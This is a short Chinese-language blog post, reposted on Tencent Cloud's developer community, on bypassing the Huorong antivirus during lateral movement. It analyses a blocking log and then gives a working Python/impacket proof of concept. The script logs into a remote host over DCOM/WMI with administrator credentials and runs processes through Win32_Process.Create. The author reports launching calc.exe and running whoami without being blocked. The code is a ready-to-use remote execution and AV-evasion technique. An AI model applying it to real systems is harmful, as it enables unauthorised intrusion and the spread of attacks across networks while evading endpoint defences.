前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >绕过杀软进行横向移动

绕过杀软进行横向移动

作者头像
黑白天安全
发布2023-08-28 17:51:04
3020
发布2023-08-28 17:51:04
举报

查看拦截日志

wmi是基于135端口进行的横向。依赖445只是因为,需要使用445取回命令执行结果。sharpwmi进行横向的时候火绒日志有一个特别有趣的地方:

这个是winmgmt的CLSID,假设sharpwmi调用这个dcom对象导致的被拦截?于是我马上自己用python写了一个wmiexec进行验证。调用calc验证我的想法,使用Process Hacker进行监控进程。

编写poc绕过

from impacket.dcerpc.v5.dcomrt import DCOMConnection, COMVERSION from impacket.dcerpc.v5.dcom import wmi from impacket.dcerpc.v5.dtypes import NULL dcom = DCOMConnection("192.168.111.180", "administrator", "123456") iInterface = dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login) iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface) iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL) iWbemLevel1Login.RemRelease() win32Process, _ = iWbemServices.GetObject('Win32_Process') win32Process.Create("c:\\windows\\system32\\calc.exe","C:\\",None)

运行代码,成功调用calc.exe。接下来,我们执行cmd命令。

修改代码执行whoami火绒并未拦截

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2023-08-15,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 黑白天实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 查看拦截日志
  • 编写poc绕过
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档